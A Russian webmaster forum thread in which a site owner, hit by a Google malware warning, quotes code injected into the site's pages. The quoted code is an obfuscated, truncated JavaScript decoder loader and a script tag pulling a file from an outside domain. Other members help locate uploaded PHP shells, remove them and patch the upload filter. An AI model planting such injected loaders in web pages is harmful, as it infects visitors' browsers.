X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> На вашем сайте обнаружен вредоносный код.
alexruss
alexruss
Topic Starter сообщение 2.10.2010, 13:42; Ответить: alexruss
Сообщение #1


Бывалый
****

Группа: User
Сообщений: 414
Регистрация: 16.3.2008
Из: Германия
Поблагодарили: 49 раз
Репутация:   10  


сегодня увидел что при входе на мой сайт с гугла вылезает такое сообщение "Предупреждение- посещение этого сайта может нанести вред Вашему компьютеру!" зашел в вебмастер гугла там пишут что на некоторых страницах сайта найден какой-то левый скрипт вот он собственно

"<script>try { function mWHsJZaoGFUaHDij(adPNLlWJ){var WbqhUr
="",JkXCS,XVbdzM,aFnYAierh,ZhCrpH,NTMsj,qaUrgISe,LJhZxqoc,HS
eAsGXIk,wFnbktGHSO;var ltZHLzXjw="ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz0123456789+/=";var sFqzDVonp="";fo
r(HSeAsGXIk=0;HSeAsGXIk<adPNLlWJ.length;){ZhCrpH=ltZHLzXjw.i
ndexOf(adPNLlWJ.charAt(HSeAsGXIk++));NTMsj=ltZHLzXjw.indexOf
(adPNLlWJ.charAt(HSeAsGXIk++));wFnbktGHSO=mWHsJZaoGFUaHDij;q
aUrgISe=ltZHLzXjw.indexOf(adPNLlWJ.charAt(HSeAsGXIk++));LJhZ
xqoc=ltZHLzXjw.indexOf(adPNLlWJ.charAt(HSeAsGXIk++));JkXCS=(
ZhCrpH<<2)+(NTMsj>>4);XVbdzM=((NTMsj&15)<<4)+(qaUrgISe>>2);a
FnYAierh=((qaUrgISe&3)<<6)+LJhZxqoc;wFnbktGHSO=wFnbktGHSO.to
String();WbqhUr+=String.fromCharCode(JkXCS);if(qaUrgISe!=64)
WbqhUr+=String.fromCharCode(XVbdzM);if(LJhZxqoc!=64)WbqhUr+=
String.fromCharCode(aFnYAierh);}wFnbktGHSO=wFnbktGHSO.replac
e(/\W/g,"");wFnbktGHSO=wFnbktGHSO.split("").reverse().join("
");wFnbktGHSO=wFnbktGHSO;for(HSeAsGXIk=0;HSeAsGXIk<WbqhUr.le
ngth;HSeAsGXIk++)sFqzDVonp+=String.fromCharCode(WbqhUr.charC
odeA"


только я не могу понять где он прописан. а на одной из статистических страниц найден вот такой скрипт "<script src="http://lapmob.ru/liveinternet.js">"
подскажите ктонибуть где он может быть и что нужно сделать что-бы удалит ошибку из гугла


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 2.10.2010, 13:48; Ответить: install
Сообщение #2


Яндекс ЛОХ
*******


Группа: Active User
Сообщений: 3530
Регистрация: 28.5.2009
Из: Нижневартовска
Поблагодарили: 1376 раз
Репутация:   201  


Ссылку дайте хоть

перед счетчиком он где то прописался.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
alexruss
alexruss
Topic Starter сообщение 2.10.2010, 13:55; Ответить: alexruss
Сообщение #3


Бывалый
****

Группа: User
Сообщений: 414
Регистрация: 16.3.2008
Из: Германия
Поблагодарили: 49 раз
Репутация:   10  


сылка в подписи а перед счетчиком в маин.тпл смотрел не нашел


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 2.10.2010, 14:09; Ответить: install
Сообщение #4


Яндекс ЛОХ
*******


Группа: Active User
Сообщений: 3530
Регистрация: 28.5.2009
Из: Нижневартовска
Поблагодарили: 1376 раз
Репутация:   201  


стандартным ДЛЕ антивирем проверку сделайте, должен показать в каких файлах были изменения.

а прописан он в майн.тпл
ну и в статике тоже удалите тот скрипт


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
alexruss
alexruss
Topic Starter сообщение 2.10.2010, 14:30; Ответить: alexruss
Сообщение #5


Бывалый
****

Группа: User
Сообщений: 414
Регистрация: 16.3.2008
Из: Германия
Поблагодарили: 49 раз
Репутация:   10  


проверил антивирем изменения были в этих двух файлах
./uploads/files/1284155792_shell.php
./uploads/files/1283642103_shell.php

что это за файлы не пойму там какой-то длинный код сейчас попробую удалить эти файлы и поменяю пороли к фтп а как можно в гугле запросить перепроверку сайта?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
KipiaSoft
KipiaSoft
сообщение 2.10.2010, 14:42; Ответить: KipiaSoft
Сообщение #6


Старожил
******

Группа: Active User
Сообщений: 2096
Регистрация: 16.11.2009
Из: Волгоград
Поблагодарили: 632 раза
Репутация:   74  


google сам предупреждение уберет в течении 1-2 дней после удаления вредного кода.
Пароли и к админке меняйте, если материалы на сайт добавляете только Вы.

Сообщение отредактировал KipiaSoft - 2.10.2010, 14:44


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
alexruss
alexruss
Topic Starter сообщение 2.10.2010, 14:45; Ответить: alexruss
Сообщение #7


Бывалый
****

Группа: User
Сообщений: 414
Регистрация: 16.3.2008
Из: Германия
Поблагодарили: 49 раз
Репутация:   10  


ок понятно буду ждать надеюсь это был тот код


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
admiNral
admiNral
сообщение 2.10.2010, 14:50; Ответить: admiNral
Сообщение #8


Участник
***

Группа: User
Сообщений: 140
Регистрация: 28.2.2010
Поблагодарили: 40 раз
Репутация:   -4  


Чтобы этого не повторилось сделайте эти изменения в движке:

Открываем engine/inc/files.php

Находим

$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );
$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );
$allowed_files = explode( ',', strtolower( $config['files_type'] ) );
$img_result_th = "";
$img_result = "";


заменяем на

$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );
$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );
$allow_conf = str_replace("php",md5(time() - rand(30,60)),strtolower( $config['files_type'] ));
$allowed_files = explode( ',', $allow_conf );
$img_result_th = "";
$img_result = "";



Теперь загрузка шеллов Вам не грозит!


--------------------
Парсинг на заказ, возьмусь за заказы от 5.000 страниц (цена договорная, пишите в личку)
Лёгкий старт или сайты за бесплатно.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 2.10.2010, 15:32; Ответить: install
Сообщение #9


Яндекс ЛОХ
*******


Группа: Active User
Сообщений: 3530
Регистрация: 28.5.2009
Из: Нижневартовска
Поблагодарили: 1376 раз
Репутация:   201  


(alexruss @ 2.10.2010, 16:30) *
что это за файлы не пойму там какой-то длинный код

вот сейчас все это "добро", что нашел стандартный антивирь ДЛЕ удаляйте и чистите шаблон от левых скриптов и кодов + то что выше написали проделайте эти манипуляции тоже
еще обновитесь - заплатки поставьте.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kulbit
kulbit
сообщение 2.10.2010, 15:38; Ответить: kulbit
Сообщение #10


Участник
***

Группа: User
Сообщений: 118
Регистрация: 14.6.2009
Поблагодарили: 44 раза
Репутация:   6  


(KipiaSoft @ 2.10.2010, 13:42) *
google сам предупреждение уберет в течении 1-2 дней после удаления вредного кода.


Там можно принудительно сделать запрос на проверку, у меня он за ночь все убрал. Вечером попросил првоерит, а утром уже надписи небыло.

Сообщение отредактировал kulbit - 2.10.2010, 15:38


--------------------
Скажи нет терпимости!!! 14


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) SimplePay: Прием платежей на сайте для юридических и физических лиц
4 kuprum 540 15.12.2017, 14:07
автор: kuprum
Горячая тема (нет новых ответов) Рекомендую: размещение статьи на сайте, ТИЦ 325, PR 6, траст XT 8
44 rumblade 10704 14.12.2017, 15:45
автор: rumblade
Открытая тема (нет новых ответов) 17 вещей на вашем сайте, которые ненавидят
Один из постулатов маркетинга — не раздражать людей
25 PostBrigada 3635 12.12.2017, 21:44
автор: alexandrrr
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПрибыль с видео на сайте и в соц сетях
Как получить доп доход с нативного контента
14 maxim_krasovskiy 2839 12.12.2017, 12:05
автор: maxim_krasovskiy
Открытая тема (нет новых ответов) ALFAcoins.com - Приём криптовалюты на вашем сайте
17 ALFAcoins 3713 11.12.2017, 23:07
автор: ALFAcoins


 



RSS Текстовая версия Сейчас: 18.12.2017, 13:12
Дизайн